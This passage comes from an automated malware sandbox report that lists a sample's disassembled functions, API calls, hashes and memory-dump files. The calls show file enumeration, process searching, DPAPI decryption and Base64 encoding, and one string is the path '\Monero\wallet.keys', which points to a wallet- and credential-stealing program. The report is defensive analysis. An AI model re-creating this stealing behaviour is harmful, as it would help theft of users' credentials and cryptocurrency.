                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: P_}/$T6*$U|$]?o$]?o$*N}$*N}
                                • API String ID: 0-686132001
                                • Opcode ID: a161b71eaa271087c5080759a188793f6127619956ab83f584fd2c2b0b44fcd8
                                • Instruction ID: 57a7767d72bfe1ccdbd868ceeb7de861ba7bad399e07b094759b92a6bec1b2f0
                                • Opcode Fuzzy Hash: a161b71eaa271087c5080759a188793f6127619956ab83f584fd2c2b0b44fcd8
                                • Instruction Fuzzy Hash: 33B229F3A0C2149FE3046F2DEC8567AFBE9EB94720F1A453DEAC4C3744EA7558058692
                                Function 00F33863 Relevance: 10.4, Strings: 7, Instructions: 1659COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: avn$5@/$>y>o$EnkG$^:ww$`hg/$g~
                                • API String ID: 0-2600474645
                                • Opcode ID: 5e79f59cf7cad031b18b81badf9a9f0bc6b92636ea90956f76fcefcaa298400c
                                • Instruction ID: f836da8f82cc548c8181af4dbd4ef80a4bd67c1fb9db778abbd647ac3188a5d1
                                • Opcode Fuzzy Hash: 5e79f59cf7cad031b18b81badf9a9f0bc6b92636ea90956f76fcefcaa298400c
                                • Instruction Fuzzy Hash: 5FB228F360C2049FE300AE29EC8567AFBE5EF94720F1A893DE6C4C7744E53598458697
                                Function 00B7E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00B90D73), ref: 00B7E4A2
                                • StrCmpCA.SHLWAPI(?,00B914F8), ref: 00B7E4F2
                                • StrCmpCA.SHLWAPI(?,00B914FC), ref: 00B7E508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00B7EBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                • Opcode ID: 52b629ca5fa07546530d5880241a178aebcaafec048cacfd0f9472429ec904ed
                                • Instruction ID: bc66710775ec192775d0e87fb5639c3019397a00ff7c9394a589b2bc53e98de7
                                • Opcode Fuzzy Hash: 52b629ca5fa07546530d5880241a178aebcaafec048cacfd0f9472429ec904ed
                                • Instruction Fuzzy Hash: C11267719101149BEB14FB74DC96EED73B8AF54300F4045EAB51AA21A1EF386F49CFA2
                                Function 00F3BF67 Relevance: 7.8, Strings: 5, Instructions: 1587COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $Q-7$0Q-7$V5w$![]$s{
                                • API String ID: 0-3527256700
                                • Opcode ID: ca508c54426626bba70b533f13f72ef2c7a410c64e9f2ac484cb2986b2872601
                                • Instruction ID: 1eed59bfe91ed880f813ca56e935b9ba3252fff001f46a69c12b30bdb1eb7c58
                                • Opcode Fuzzy Hash: ca508c54426626bba70b533f13f72ef2c7a410c64e9f2ac484cb2986b2872601
                                • Instruction Fuzzy Hash: F3B2F6F360C204AFE7046E2DEC85B7ABBE9EF94720F16493DE6C4C7744EA3558018696
                                Function 00B7C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00B7C871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00B7C87C
                                • lstrcat.KERNEL32(?,00B90B46), ref: 00B7C943
                                • lstrcat.KERNEL32(?,00B90B47), ref: 00B7C957
                                • lstrcat.KERNEL32(?,00B90B4E), ref: 00B7C978
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: ed1bdf692915836ff6e1ad1eac37be8d367cc839f98ee512eadbd2353ae700de
                                • Instruction ID: ed0311c464d65319cc70d115ec77a647bd5cba195c667dad9e59e8410282e594
                                • Opcode Fuzzy Hash: ed1bdf692915836ff6e1ad1eac37be8d367cc839f98ee512eadbd2353ae700de
                                • Instruction Fuzzy Hash: ED4141B5904219EFDB10DF94DD89BEEB7B8BB48704F1042A8E609A6280D7705A84CFA1
                                Function 00B77240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00B7724D
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B77254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00B77281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00B772A4
                                • LocalFree.KERNEL32(?), ref: 00B772AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: c6151278850baec43f2c2fbf104f38eb07ab4fedb0cb2540a0a6cd6f9e754ade
                                • Instruction ID: c3bf09d02dfdec45ade36450f55eee600ad131b503297494b1e47382ac2f2958
                                • Opcode Fuzzy Hash: c6151278850baec43f2c2fbf104f38eb07ab4fedb0cb2540a0a6cd6f9e754ade
                                • Instruction Fuzzy Hash: AF010075A40308FBEB10DBD8CD49F9D77B8EB44700F108159FB19EA2C0DA70AA008B65
                                Function 00B89600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B8961E
                                • Process32First.KERNEL32(00B90ACA,00000128), ref: 00B89632
                                • Process32Next.KERNEL32(00B90ACA,00000128), ref: 00B89647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 00B8965C
                                • CloseHandle.KERNEL32(00B90ACA), ref: 00B8967A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 9dfabb9e2864f9f4b4643da527d1f539a730db51116f4a9fdbad9425da190dcd
                                • Instruction ID: 95d4fd6407b957923ffc37ddfbbd10a1a0e17316d2fcd6f989d4806e85865478
                                • Opcode Fuzzy Hash: 9dfabb9e2864f9f4b4643da527d1f539a730db51116f4a9fdbad9425da190dcd
                                • Instruction Fuzzy Hash: AA01E975A00308EBCF14DFA5DD98BEDBBF8EB48700F1442C8A905E6250EB349A40DF61
                                Function 00F3A4EC Relevance: 6.6, Strings: 4, Instructions: 1598COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #r}$?C}o$T<[w$]7_
                                • API String ID: 0-1160683953
                                • Opcode ID: 7ed07cd0d8308d7d5272d977bd17abc6e27453a85167c66014f02ce22b9b73b9
                                • Instruction ID: e9dbdfa1c60de0c299cf07724af7b3a030bfcb0a8a282b8587a7b6fa2a502b10
                                • Opcode Fuzzy Hash: 7ed07cd0d8308d7d5272d977bd17abc6e27453a85167c66014f02ce22b9b73b9
                                • Instruction Fuzzy Hash: B3B239F3A0C2049FE3046E2DEC8567AFBE9EF94320F1A493DEAC4D7744E67558048696
                                Function 00F40EF3 Relevance: 6.6, Strings: 4, Instructions: 1585COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: J*lO$Wz?o$jF7$=
                                • API String ID: 0-3442474099
                                • Opcode ID: b6f1c08e6760db4411b5aca2455213f98086f4550937b4b9b55afaffbaba0227
                                • Instruction ID: fe8809cdbf362313f0a86f048b8b2c366e964c62a67da8c0a6d911e7766e5aa2
                                • Opcode Fuzzy Hash: b6f1c08e6760db4411b5aca2455213f98086f4550937b4b9b55afaffbaba0227
                                • Instruction Fuzzy Hash: E1A2E5B360C2149FE314AE2DEC8567AFBE9EF94720F16853DEAC4C3744EA3558018697
                                Function 00B88680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00B905B7), ref: 00B886CA
                                • Process32First.KERNEL32(?,00000128), ref: 00B886DE
                                • Process32Next.KERNEL32(?,00000128), ref: 00B886F3
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                • CloseHandle.KERNEL32(?), ref: 00B88761
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 51c2164cb463a07efd708146616ff9fc0671b09c2bd8ac51c73a4cb447c7f728
                                • Instruction ID: b77800f553e4bcf936dd7f2ce9e85d84794bfa61d4f6272837a8bddbf1efd29e
                                • Opcode Fuzzy Hash: 51c2164cb463a07efd708146616ff9fc0671b09c2bd8ac51c73a4cb447c7f728
                                • Instruction Fuzzy Hash: 44313C71901218EBDB24EB54DC45FEEB7B8EB45700F5042EAE10AA21B0DF346E45CFA1
                                Function 00B88EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,00B75184,40000001,00000000,00000000,?,00B75184), ref: 00B88EC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
